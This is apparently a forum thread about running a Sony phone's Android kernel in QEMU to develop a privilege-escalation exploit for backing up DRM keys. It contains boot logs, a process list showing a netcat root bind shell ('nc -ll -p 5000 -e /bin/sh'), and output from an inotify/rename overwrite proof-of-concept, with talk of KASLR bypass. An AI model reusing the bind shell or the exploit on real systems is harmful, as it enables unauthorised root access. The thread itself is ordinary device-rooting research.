[ 0.613810] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 0.613840] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 0.614477] can't find qcom,msm-imem node
[ 0.614555] socinfo_print: v0.1, id=0, ver=0.1
[ 0.614876] msm_bus_fabric_init_driver
[ 0.617203] vgaarb: loaded
[ 0.619519] SCSI subsystem initialized
[ 0.621504] usbcore: registered new interface driver usbfs
[ 0.621968] usbcore: registered new interface driver hub
[ 0.622562] usbcore: registered new device driver usb
[ 0.623818] media: Linux media interface: v0.10
[ 0.624062] Linux video capture interface: v2.00
[ 0.636355] dev-cpufreq: No tables parsed from DT.
[ 0.637869] Advanced Linux Sound Architecture Driver Initialized.
[ 0.646543] Bluetooth: ffffffc0784b7cf0
[ 0.646800] NET: Registered protocol family 31
[ 0.646850] Bluetooth: ffffffc0784b7cf0
[ 0.647078] Bluetooth: ffffffc0784b7cd0Bluetooth: ffffffc0784b7ca0
[ 0.647570] Bluetooth: ffffffc0784b7cb0<6>[ 0.652956] NetLabel: Initializing
[ 0.653014] NetLabel: domain hash size = 128
[ 0.653038] NetLabel: protocols = UNLABELED CIPSOv4
[ 0.654938] cfg80211: World regulatory domain updated:
[ 0.654992] cfg80211: DFS Master region: unset
[ 0.655037] cfg80211: (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp), (dfs_cac_time)
[ 0.655125] cfg80211: (2402000 KHz - 2472000 KHz @ 20000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655163] cfg80211: (2457000 KHz - 2482000 KHz @ 20000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655188] cfg80211: (5170000 KHz - 5250000 KHz @ 80000 KHz), (N/A, 2000 mBm), (N/A)
[ 0.655234] cfg80211: (5250000 KHz - 5330000 KHz @ 80000 KHz), (N/A, 2000 mBm), (0 s)
[ 0.655260] cfg80211: (5490000 KHz - 5730000 KHz @ 80000 KHz), (N/A, 2000 mBm), (0 s)
[ 0.655284] cfg80211: (5735000 KHz - 5835000 KHz @ 80000 KHz), (N/A, 1400 mBm), (N/A)
[ 0.656154] NetLabel: unlabeled traffic allowed by default
[ 0.656738] pcie:pcie_init.
[ 0.662722] clocksource: Switched to clocksource arch_sys_counter
[ 0.879216] pnp: PnP ACPI: disabled
[ 0.883774] NET: Registered protocol family 2
[ 0.891608] TCP established hash table entries: 16384 (order: 5, 131072 bytes)
[ 0.892033] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
[ 0.892514] TCP: Hash tables configured (established 16384 bind 16384)
[ 0.893122] UDP hash table entries: 1024 (order: 3, 32768 bytes)
[ 0.893331] UDP-Lite hash table entries: 1024 (order: 3, 32768 bytes)
[ 0.895278] NET: Registered protocol family 1
[ 0.895829] PCI: CLS 0 bytes, default 64
[ 0.907093] Trying to unpack rootfs image as initramfs...
[ 1.813394] Freeing initrd memory: 10856K (ffffffc008000000 - ffffffc008a9a000)
[ 1.839873] audit: initializing netlink subsys (disabled)
[ 1.841323] audit: type=2000 audit(1.830:1): initialized
[ 1.843654] Initialise system trusted keyring
[ 1.845285] vmscan: error setting kswapd cpu affinity mask
[ 1.868530] VFS: Disk quotas dquot_6.6.0
[ 1.869111] VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
[ 1.877043] Registering sdcardfs 0.1
[ 1.879381] fuse init (API version 7.23)
[ 1.880925] SELinux: Registering netfilter hooks
[ 1.883759] pfk_ecryptfs [pfk_ecryptfs_init]: PFK ecryptfs inited successfully
[ 1.883827] pfk_ext4 [pfk_ext4_init]: PFK EXT4 inited successfully
[ 1.883940] pfk [pfk_init]: Driver initialized successfully
[ 1.906531] Key type asymmetric registered
[ 1.906667] Asymmetric key parser 'x509' registered
[ 1.907447] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 251)
[ 1.907643] io scheduler noop registered
[ 1.907745] io scheduler deadline registered
[ 1.908491] io scheduler cfq registered (default)
[ 1.914647] mdss_dsi_status_init: DSI status check interval:5000
[ 1.924056] _smem_log_init: no log or log_idx allocated
[ 1.924109] smem_log_initialize: init failed -19
[ 1.928406] spcom [spcom_init]: spcom driver Ver 1.0 23-Nov-2015.
[ 1.930476] audio_notifer_reg_service: service SSR_MODEM is in use
[ 1.935741] pil: failed to find qcom,msm-imem-pil node
[ 1.943836] msm_serial: driver initialized
[ 1.944825] msm_serial_hs module loaded
[ 1.999765] diag: Unable to register MHI read channel for 0, err: -22
[ 2.001287] diag: Unable to initialze diagfwd bridge, err: -12
[ 2.006917] Unable to detect cache hierarchy from DT for CPU 0
[ 2.053950] brd: module loaded
[ 2.078315] loop: module loaded
[ 2.081406] zram: Added device: zram0
[ 2.091074] tof_sensor_init: Initialize i2c driver
[ 2.091234] tof_sensor_init: Added i2c driver rc = 0Initialize TCS3490 driver
[ 2.091447] TCS3490 added i2c driver rc = 0<6>[ 2.097314] SCSI Media Changer driver v0.25
[ 2.098726] Ethernet Channel Bonding Driver: v3.7.1 (April 27, 2011)
[ 2.111375] tun: Universal TUN/TAP device driver, 1.6
[ 2.111422] tun: (C) 1999-2004 Max Krasnyansky <[email protected]>
[ 2.111816] sky2: driver version 1.30
[ 2.112935] PPP generic driver version 2.4.2
[ 2.113685] PPP BSD Compression module registered
[ 2.113776] PPP Deflate Compression module registered
[ 2.113968] PPP MPPE Compression module registered
[ 2.114073] NET: Registered protocol family 24
[ 2.121575] usb_host_ext_event has been registered!
[ 2.122073] usbcore: registered new interface driver usb-storage
[ 2.122469] usbcore: registered new interface driver usb_ehset_test
[ 2.125553] msm_sharedmem: sharedmem_register_qmi: qmi init successful
[ 2.126057] diag: failed to find diag_dload imem node
[ 2.128723] mousedev: PS/2 mouse device common for all mice
[ 2.129813] usbcore: registered new interface driver xpad
[ 2.131793] stmvl53l0_init: Enter
[ 2.131865] stmvl53l0_init_cci: Enter
[ 2.132239] stmvl53l0_init_cci: End
[ 2.132288] stmvl53l0_init: End
[ 2.132729] fpc1145_init OK
[ 2.133628] i2c /dev entries driver
[ 2.138308] ------------[ cut here ]------------
[ 2.138340] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/media/platform/msm/camera_v2/msm.c:401
[ 2.138361] Modules linked in:
[ 2.138390]
[ 2.138527] CPU: 1 PID: 1 Comm: swapper/0 Tainted: G W 4.4.74-perf+ #1
[ 2.138558] Hardware name: linux,dummy-virt (DT)
[ 2.138601] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 2.138639] PC is at msm_sd_register+0x198/0x1fc
[ 2.138666] LR is at msm_sensor_init_module+0x114/0x1b8
[ 2.138686] pc : [<ffffff800897d1fc>] lr : [<ffffff8009c47ab0>] pstate: 60400145
[ 2.138701] sp : ffffffc0784b7d20
[ 2.138735] x29: ffffffc0784b7d20 x28: ffffff8009c82838
[ 2.138770] x27: ffffff8009c735a0 x26: ffffff8009c73570
[ 2.138800] x25: ffffff8009c004b4 x24: 0000000000000000
[ 2.138830] x23: ffffff800aa4b530 x22: ffffff800aa4b528
[ 2.138869] x21: ffffff800aa4b000 x20: ffffff800a833000
[ 2.138907] x19: ffffff800aa4b000 x18: 00000000deab7ec7
[ 2.138937] x17: 00000000432aff97 x16: 0000000000000001
[ 2.138966] x15: 0000000000000003 x14: 0ffffffffffffffe
[ 2.138995] x13: 0000000000000030 x12: 0101010101010101
[ 2.139025] x11: ff7f7f7f7f7f7f7f x10: fdff646b74636e6c
[ 2.139054] x9 : 0000000000000000 x8 : ffffffc076698e00
[ 2.139083] x7 : 0000000000000000 x6 : ffffffc076698c28
[ 2.139111] x5 : 0000000000000040 x4 : ffffff800aa4b088
[ 2.139140] x3 : 000000000000000e x2 : 0000000000020006
[ 2.139169] x1 : ffffffc076698c00 x0 : ffffffc076698c28
[ 2.139200]
[ 2.139200] PC: 0xffffff800897d1bc:
[ 2.139222] d1bc 12800002 52800023 f94046a4 97fef414 2a0003f3 37f80433 52800a20 b90072a0
[ 2.139580] d1dc b943aa80 b90076a0 f9406a80 b4000320 f90012a0 52800000 f9007ab4 17ffffc5
[ 2.139939] d1fc d4210000 12800080 f94013f5 a94153f3 a8c37bfd d65f03c0 d4210000 128002a0
[ 2.140339] d21c f94013f5 a94153f3 a8c37bfd d65f03c0 12800173 f9407aa0 b4000080 97fef7df
[ 2.140723]
[ 2.140723] LR: 0xffffff8009c47a70:
[ 2.140753] 7a70 f9006a77 b900be64 9100a260 97b3c52d f94296a1 52a00043 528000c2 91038020
[ 2.141119] 7a90 72a00042 b9005023 528001c3 f9002420 9100a020 b9006023 b9015822 97b4d56e
[ 2.141488] 7ab0 2a0003f3 340001e0 9125a280 9101e000 79404401 36100381 f0ffb482 f0ffe3e1
[ 2.141872] 7ad0 912f2042 91386021 9101e042 52801803 aa0203e4 2a1303e5 979e0bdd 14000012
[ 2.142246]
[ 2.142246] SP: 0xffffffc0784b7ce0:
[ 2.142275] 7ce0 09c47ab0 ffffff80 784b7d20 ffffffc0 0897d1fc ffffff80 60400145 00000000
[ 2.142660] 7d00 764eba80 ffffffc0 09c4799c ffffff80 ffffffff ffffffff 09c47a80 ffffff80
[ 2.143027] 7d20 784b7d50 ffffffc0 09c47ab0 ffffff80 76698c00 ffffffc0 0a833000 ffffff80
[ 2.143401] 7d40 0aa4b000 ffffff80 00000000 00000000 784b7d90 ffffffc0 08083adc ffffff80
[ 2.143841]
[ 2.143883] ---[ end trace cf17d4d9cad0286d ]---
[ 2.143920] Call trace:
[ 2.143951] Exception stack(0xffffffc0784b7b50 to 0xffffffc0784b7c80)
[ 2.144022] 7b40: ffffff800aa4b000 0000008000000000
[ 2.144134] 7b60: 0000000042b66000 ffffff800897d1fc ffffff8031303531 cb88537fdc8ba64a
[ 2.144253] 7b80: ffffffc0784b7c10 ffffff80083aa2d4 ffffffc0784b7d90 00000000ffffffd8
[ 2.144366] 7ba0: ffffff800923e648 0000000000000800 0000000000000000 ffffffc0764eba80
[ 2.144480] 7bc0: ffffff800a7f1000 ffffffc0764f0b00 ffffffc0784b7c10 ffffff80083aa208
[ 2.144593] 7be0: ffffffc0784b7d90 00000000ffffffd0 ffffffc076698c28 ffffffc076698c00
[ 2.144707] 7c00: 0000000000020006 000000000000000e ffffff800aa4b088 0000000000000040
[ 2.144821] 7c20: ffffffc076698c28 0000000000000000 ffffffc076698e00 0000000000000000
[ 2.144934] 7c40: fdff646b74636e6c ff7f7f7f7f7f7f7f 0101010101010101 0000000000000030
[ 2.145057] 7c60: 0ffffffffffffffe 0000000000000003 0000000000000001 00000000432aff97
[ 2.145115] [<ffffff800897d1fc>] msm_sd_register+0x198/0x1fc
[ 2.145153] [<ffffff8009c47ab0>] msm_sensor_init_module+0x114/0x1b8
[ 2.145189] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 2.145225] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 2.145262] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 2.145291] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 2.146752] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (0) 2326
[ 2.147185] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (1) 2326
[ 2.147237] (NULL device *): sony_sensor_init_module: sony_sensor_init_module platform_driver_probe (0) 2353
[ 2.150963] ------------[ cut here ]------------
[ 2.150994] WARNING: at /home/hudsonslave/root/workspace/offbuild_pre-yoshino2-2.0.0_android_matrix/HUDSON_PRODUCT/lilac/HUDSON_VARIANT/user/label/CM/kernel/msm-4.4/drivers/media/platform/msm/camera_v2/msm.c:401
[ 2.151014] Modules linked in:
[ 2.151040]
[ 2.151073] CPU: 1 PID: 1 Comm: swapper/0 Tainted: G W 4.4.74-perf+ #1
[ 2.151093] Hardware name: linux,dummy-virt (DT)
[ 2.151115] task: ffffffc0784d8000 ti: ffffffc0784b4000 task.ti: ffffffc0784b4000
[ 2.151147] PC is at msm_sd_register+0x198/0x1fc
[ 2.151173] LR is at msm_buf_mngr_init+0x114/0x200
[ 2.151192] pc : [<ffffff800897d1fc>] lr : [<ffffff8009c484e8>] pstate: 60400145
[ 2.151208] sp : ffffffc0784b7d20
[ 2.151224] x29: ffffffc0784b7d20 x28: ffffff8009c82898
[ 2.151257] x27: ffffff8009c735a0 x26: ffffff8009c73570
[ 2.151286] x25: ffffff8009c004b4 x24: ffffff800aa6d000
[ 2.151316] x23: ffffff80092e0458 x22: ffffff800aa6d000
[ 2.151345] x21: ffffff800aa6d700 x20: ffffffc076698c00
[ 2.151374] x19: ffffff800aa4b000 x18: 00000000deab7ec7
[ 2.151403] x17: 00000000432aff97 x16: 0000000000000001
[ 2.151432] x15: 0000000000000003 x14: 0ffffffffffffffe
[ 2.151461] x13: 0000000000000008 x12: 0101010101010101
[ 2.151490] x11: ffffff800894aa7c x10: ffffff800894b560
[ 2.151519] x9 : 0000000000000000 x8 : 0000000000000000
[ 2.151547] x7 : 0000000000000000 x6 : ffffffc076698c20
[ 2.151583] x5 : ffffff80089f1e44 x4 : ffffff800aa4b088
[ 2.151613] x3 : 000000000000000d x2 : 0000000000040000
[ 2.151649] x1 : ffffffc076698c00 x0 : ffffffc076698c20
[ 2.151680]
[ 2.151680] PC: 0xffffff800897d1bc:
[ 2.151702] d1bc 12800002 52800023 f94046a4 97fef414 2a0003f3 37f80433 52800a20 b90072a0
[ 2.152054] d1dc b943aa80 b90076a0 f9406a80 b4000320 f90012a0 52800000 f9007ab4 17ffffc5
[ 2.152404] d1fc d4210000 12800080 f94013f5 a94153f3 a8c37bfd d65f03c0 d4210000 128002a0
[ 2.152769] d21c f94013f5 a94153f3 a8c37bfd d65f03c0 12800173 f9407aa0 b4000080 97fef7df
[ 2.153124]
[ 2.153124] LR: 0xffffff8009c484a8:
[ 2.153152] 84a8 f9008294 91288084 f90012a5 f90016a4 97b3c29e f9437f01 910322e2 52a00040
[ 2.153499] 84c8 528001a3 b9004820 91008020 f9006422 52a00082 b9005823 b9015022 97b4d2e0
[ 2.153848] 84e8 2a0003f4 34000140 9101c2e1 90ffe460 910ca000 52806be2 aa0103e3 2a1403e4
[ 2.154198] 8508 97951e9d 2a1403e0 1400002c f9437f02 b1008040 f9408841 f9003c35 54000100
[ 2.154553]
[ 2.154553] SP: 0xffffffc0784b7ce0:
[ 2.154580] 7ce0 09c484e8 ffffff80 784b7d20 ffffffc0 0897d1fc ffffff80 60400145 00000000
[ 2.154922] 7d00 764eba80 ffffffc0 09c483d4 ffffff80 ffffffff ffffffff 09c484bc ffffff80
[ 2.155277] 7d20 784b7d50 ffffffc0 09c484e8 ffffff80 092e0000 ffffff80 76698c00 ffffffc0
[ 2.155647] 7d40 0aa6d700 ffffff80 00000000 00000000 784b7d90 ffffffc0 08083adc ffffff80
[ 2.156069]
[ 2.156095] ---[ end trace cf17d4d9cad0286e ]---
[ 2.156117] Call trace:
[ 2.156143] Exception stack(0xffffffc0784b7b50 to 0xffffffc0784b7c80)
[ 2.156209] 7b40: ffffff800aa4b000 0000008000000000
[ 2.156324] 7b60: 0000000042b66000 ffffff800897d1fc 00000000ffffffff cb88537fdc8ba64a
[ 2.156432] 7b80: ffffffc0784b7c10 ffffff80083aa2d4 ffffffc0784b7d90 00000000ffffffd8
[ 2.156540] 7ba0: ffffff800923e648 ffffff80083a1150 ffffffc0766ef000 0000000000000800
[ 2.156649] 7bc0: 0000000000000000 ffffffc0764eba80 ffffffc0784b7c10 ffffff80083aa208
[ 2.156756] 7be0: ffffffc0784b7d90 00000000ffffffd0 ffffffc076698c20 ffffffc076698c00
[ 2.156865] 7c00: 0000000000040000 000000000000000d ffffff800aa4b088 ffffff80089f1e44
[ 2.156972] 7c20: ffffffc076698c20 0000000000000000 0000000000000000 0000000000000000
[ 2.157080] 7c40: ffffff800894b560 ffffff800894aa7c 0101010101010101 0000000000000008
[ 2.157188] 7c60: 0ffffffffffffffe 0000000000000003 0000000000000001 00000000432aff97
[ 2.157240] [<ffffff800897d1fc>] msm_sd_register+0x198/0x1fc
[ 2.157275] [<ffffff8009c484e8>] msm_buf_mngr_init+0x114/0x200
[ 2.157307] [<ffffff8008083adc>] do_one_initcall+0xc4/0x1dc
[ 2.157340] [<ffffff8009c00e68>] kernel_init_freeable+0x1a8/0x248
[ 2.157373] [<ffffff80091051c4>] kernel_init+0x18/0x138
[ 2.157401] [<ffffff80080830c0>] ret_from_fork+0x10/0x50
[ 2.157447] CAM-BUFMGR msm_buf_mngr_init:863 msm_buf_mngr_init: msm_sd_register error = -5
[ 2.164607] tsens_controller_is_present: tsens_controller_is_present: TSENS controller not available
[ 2.164687] _tsens_register_thermal: _tsens_register_thermal: TSENS early init not done
[ 2.165473] md: linear personality registered for level -1
[ 2.166120] device-mapper: uevent: version 1.0.3
[ 2.167337] device-mapper: ioctl: 4.34.0-ioctl (2015-10-28) initialised: [email protected]
[ 2.168421] device-mapper: req-crypt: dm-req-crypt successfully initalized.
[ 2.168421]
[ 2.170719] sdhci: Secure Digital Host Controller Interface driver
[ 2.170754] sdhci: Copyright(c) Pierre Ossman
[ 2.170813] sdhci-pltfm: SDHCI platform and OF driver helper
[ 2.175886] usbcore: registered new interface driver usbhid
[ 2.175928] usbhid: USB HID core driver
[ 2.176592] ashmem: initialized
[ 2.192929] hw perfevents: enabled with armv8_pmuv3 PMU driver, 1 counters available
[ 2.203890] usbcore: registered new interface driver snd-usb-audio
[ 2.225873] sony_hweffect_params_init
[ 2.228462] GACT probability NOT on
[ 2.228790] Mirror/redirect action on
[ 2.229052] u32 classifier
[ 2.229080] Actions configured
[ 2.229531] Netfilter messages via NETLINK v0.30.
[ 2.230447] nf_conntrack version 0.5.0 (16384 buckets, 65536 max)
[ 2.234582] ctnetlink v0.93: registering with nfnetlink.
[ 2.240127] xt_time: kernel timezone is -0000
[ 2.243542] ip_tables: (C) 2000-2006 Netfilter Core Team
[ 2.248215] arp_tables: (C) 2002 David S. Miller
[ 2.249607] Initializing XFRM netlink socket
[ 2.252047] NET: Registered protocol family 10
[ 2.262166] mip6: Mobile IPv6
[ 2.262432] ip6_tables: (C) 2000-2006 Netfilter Core Team
[ 2.264716] sit: IPv6 over IPv4 tunneling driver
[ 2.267729] NET: Registered protocol family 17
[ 2.268306] NET: Registered protocol family 15
[ 2.268815] bridge: automatic filtering via arp/ip/ip6tables has been deprecated. Update your scripts to load br_netfilter if you need this.
[ 2.268915] Ebtables v2.0 registered
[ 2.269846] l2tp_core: L2TP core driver, V2.0
[ 2.270120] l2tp_ppp: PPPoL2TP kernel driver, V2.0
[ 2.270188] l2tp_ip: L2TP IP encapsulation support (L2TPv3)
[ 2.270361] l2tp_netlink: L2TP netlink interface
[ 2.270880] l2tp_eth: L2TP ethernet pseudowire support (L2TPv3)
[ 2.270955] l2tp_ip6: L2TP IP encapsulation support for IPv6 (L2TPv3)
[ 2.271666] NET: Registered protocol family 27
[ 2.288350] Registered cp15_barrier emulation handler
[ 2.288510] Registered setend emulation handler
[ 2.291405] registered taskstats version 1
[ 2.291648] Loading compiled-in X.509 certificates
[ 2.302327] Loaded X.509 cert 'Build time autogenerated kernel key: 70cf1635829ba84ab2643804f0666714b694ca11'
[ 2.304493] Loaded X.509 cert 'Android: 7e4333f9bba00adfe0ede979e28ed1920492b40f'
[ 2.543600] Key type encrypted registered
[ 2.545603] modem_restart_late_init: Unable to create smem ramdump device.
[ 2.546929] spss_utils [spss_init]: spss-utils driver Ver 1.2 13-Jan-2017.
[ 2.547854] servloc: init_service_locator: Service Locator not enabled
[ 2.547905] servloc: pd_locator_work: Unable to connect to service locator!, rc = -19
[ 2.548122] audio_notifer_reg_service: service SSR_ADSP is in use
[ 2.558173] RNDIS_IPA module is loaded.
[ 2.560110] hctosys: unable to open rtc device (rtc0)
[ 2.568247] clock_late_init: Removing enables held for handed-off clocks
[ 2.568376] ALSA device list:
[ 2.568423] No soundcards found.
[ 2.569282] Warning: unable to open an initial console.
[ 2.706130] Freeing unused kernel memory: 10240K ...
Here few linux commands from linux shell under that kernel in qemu:
Code:
ps
PID USER COMMAND
1 0 init
2 0 [kthreadd]
3 0 [ksoftirqd/0]
4 0 [kworker/0:0]
5 0 [kworker/0:0H]
6 0 [kworker/u4:0]
7 0 [rcu_preempt]
8 0 [rcu_sched]
9 0 [rcu_bh]
10 0 [rcuop/0]
11 0 [rcuos/0]
12 0 [rcuob/0]
13 0 [rcuc/0]
14 0 [rcub/0]
15 0 [migration/0]
16 0 [migration/1]
17 0 [rcuc/1]
18 0 [ksoftirqd/1]
19 0 [kworker/1:0]
20 0 [kworker/1:0H]
21 0 [rcuop/1]
22 0 [rcuos/1]
23 0 [rcuob/1]
24 0 [netns]
25 0 [perf]
26 0 [smd_channel_clo]
27 0 [dsps_smd_trans_]
28 0 [lpass_smd_trans]
29 0 [mpss_smd_trans_]
30 0 [wcnss_smd_trans]
31 0 [rpm_smd_trans_g]
32 0 [ipa_usb_wq]
33 0 [deferwq]
34 0 [kworker/u4:1]
35 0 [writeback]
36 0 [kcompactd0]
37 0 [crypto]
38 0 [bioset]
39 0 [kblockd]
40 0 [md]
41 0 [devfreq_wq]
42 0 [governor_msm_ad]
43 0 [kworker/1:1]
44 0 [cfg80211]
45 0 [kworker/0:1]
71 0 [power_off_alarm]
72 0 [kswapd0]
73 0 [vmstat]
74 0 [fsnotify_mark]
75 0 [ecryptfs-kthrea]
107 0 [glink_ssr_wq]
108 0 [glink_lbsrv]
109 0 [glink_xprt_wq]
110 0 [apr_driver]
111 0 [glink_pkt_wq]
113 0 [diag_real_time_]
114 0 [diag_wq]
115 0 [DIAG_USB_diag]
116 0 [diag_cntl_wq]
117 0 [diag_dci_wq]
118 0 [DIAG_SMD_MODEM_]
119 0 [DIAG_SMD_MODEM_]
120 0 [DIAG_SMD_MODEM_]
121 0 [DIAG_SMD_MODEM_]
122 0 [DIAG_SMD_MODEM_]
123 0 [DIAG_SMD_LPASS_]
124 0 [DIAG_SMD_LPASS_]
125 0 [DIAG_SMD_LPASS_]
126 0 [DIAG_SMD_LPASS_]
127 0 [DIAG_SMD_LPASS_]
128 0 [DIAG_SMD_WCNSS_]
129 0 [DIAG_SMD_WCNSS_]
130 0 [DIAG_SMD_WCNSS_]
131 0 [DIAG_SMD_WCNSS_]
132 0 [DIAG_SMD_WCNSS_]
133 0 [DIAG_SMD_SENSOR]
134 0 [DIAG_SMD_SENSOR]
135 0 [DIAG_SMD_SENSOR]
136 0 [DIAG_SMD_SENSOR]
137 0 [DIAG_SMD_SENSOR]
138 0 [DIAG_SMD_DIAG_C]
139 0 [DIAG_SMD_DIAG_D]
140 0 [DIAG_SMD_DIAG_C]
141 0 [DIAG_SMD_DIAG_D]
142 0 [DIAG_SMD_DIAG_D]
143 0 [DIAG_SMD_CDSP_C]
144 0 [DIAG_SMD_CDSP_D]
145 0 [DIAG_SMD_CDSP_C]
146 0 [DIAG_SMD_CDSP_D]
147 0 [DIAG_SMD_CDSP_D]
148 0 [DIAG_SOCKMODEM_]
149 0 [DIAG_SOCKMODEM_]
150 0 [DIAG_SOCKMODEM_]
151 0 [DIAG_SOCKMODEM_]
152 0 [DIAG_SOCKMODEM_]
153 0 [DIAG_SOCKLPASS_]
154 0 [DIAG_SOCKLPASS_]
155 0 [DIAG_SOCKLPASS_]
156 0 [DIAG_SOCKLPASS_]
157 0 [DIAG_SOCKLPASS_]
158 0 [DIAG_SOCKWCNSS_]
159 0 [DIAG_SOCKWCNSS_]
160 0 [DIAG_SOCKWCNSS_]
161 0 [DIAG_SOCKWCNSS_]
162 0 [DIAG_SOCKWCNSS_]
163 0 [DIAG_SOCKSENSOR]
164 0 [DIAG_SOCKSENSOR]
165 0 [DIAG_SOCKSENSOR]
166 0 [DIAG_SOCKSENSOR]
167 0 [DIAG_SOCKSENSOR]
168 0 [DIAG_SOCKDIAG_C]
169 0 [DIAG_SOCKDIAG_D]
170 0 [DIAG_SOCKDIAG_C]
171 0 [DIAG_SOCKDIAG_D]
172 0 [DIAG_SOCKDIAG_D]
173 0 [DIAG_SOCKCDSP_C]
174 0 [DIAG_SOCKCDSP_D]
175 0 [DIAG_SOCKCDSP_C]
176 0 [DIAG_SOCKCDSP_D]
177 0 [DIAG_SOCKCDSP_D]
178 0 [DIAG_CNTL_SOCKE]
179 0 [DIAG_GLINK_DIAG]
180 0 [DIAG_GLINK_DIAG]
181 0 [DIAG_GLINK_DIAG]
182 0 [DIAG_GLINK_DIAG]
183 0 [DIAG_GLINK_DIAG]
185 0 [DIAG_USB_diag_m]
186 0 [kgsl-workqueue]
187 0 [kgsl-mementry]
188 0 [kgsl_worker_thr]
189 0 [bioset]
190 0 [bioset]
191 0 [bioset]
192 0 [bioset]
193 0 [bioset]
194 0 [bioset]
195 0 [bioset]
196 0 [bioset]
197 0 [bioset]
198 0 [bioset]
199 0 [bioset]
200 0 [bioset]
201 0 [bioset]
202 0 [bioset]
203 0 [bioset]
204 0 [bioset]
205 0 [bioset]
206 0 [bioset]
207 0 [bioset]
208 0 [bioset]
209 0 [bioset]
210 0 [bioset]
211 0 [bioset]
212 0 [bioset]
213 0 [bioset]
214 0 [memory_wq]
215 0 [qcrypto_seq_res]
216 0 [bond0]
217 0 [sharedmem_qmi_w]
218 0 [qmi_hndl0000000]
219 0 [msm_ipc_router]
220 0 [uether]
221 0 [k_ipa_usb]
222 0 [dm_bufio_cache]
223 0 [binder]
224 0 [hwbinder]
225 0 [vndbinder]
226 0 [uaudio_svc]
227 0 [qmi_hndl0000000]
228 0 [ipv6_addrconf]
229 0 [kworker/u4:2]
238 0 [msm_perf:events]
239 0 [rq_stats]
340 0 nc -ll -p 5000 -e /bin/sh
341 0 /bin/sh
344 0 ps
cat /proc/version
Linux version 4.4.74-perf+ ([email protected]) (gcc version 4.9.x 20150123 (prerelease) (GCC) ) #1 SMP PREEMPT Wed Aug 9 16:09:57 2017
cat /proc/cpuinfo
Processor : AArch64 Processor rev 0 (aarch64)
processor : 0
BogoMIPS : 125.00
Features : fp asimd evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x41
CPU architecture: 8
CPU variant : 0x1
CPU part : 0xd07
CPU revision : 0
processor : 1
BogoMIPS : 125.00
Features : fp asimd evtstrm aes pmull sha1 sha2 crc32
CPU implementer : 0x41
CPU architecture: 8
CPU variant : 0x1
CPU part : 0xd07
CPU revision : 0
Hardware : Qualcomm Technologies, Inc Unknown CPU
Tried also again the inotify/rename poc, this time built statically for linux:
Code:
/exploit-aarch64-linux-gnu
Listening for events.
Listening for events.
alloc_len : 50
longname="test_dir/bbbb32103210321032100��1����"
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : bbbb32103210321032100��1����, event->len : 32
handle_events() event->name : b, event->len : 16
Detected overwrite!!!
callrename done.
So it works also in qemu, running the kernel binary from the firmware (needed few binary patches to avoid hangs due to missing hw features), so this makes a very good playground for real exploit implementation - kernel offsets (after kaslr bypass) should hopefully match with the real device.
There is still a lot of work to do - anybody willing to help?
I'm sorry I can't help because I lack the skills to, but I will sure pay the amount I pledged in the DRM key backup/restore bounty thread, if you manage to pull it off and allow also non developers to do it!
Here an advise: anybody who likes to keep a possibility to backup drm keys should disable all updates so that the fw version stays at the one which a phone was bought with.
It is possible that Sony would disable downgrades since particular version - that is after all a google's recommendation for vendors:
google-urges-smartphone-partners-support-android-oreos-rollback-protection
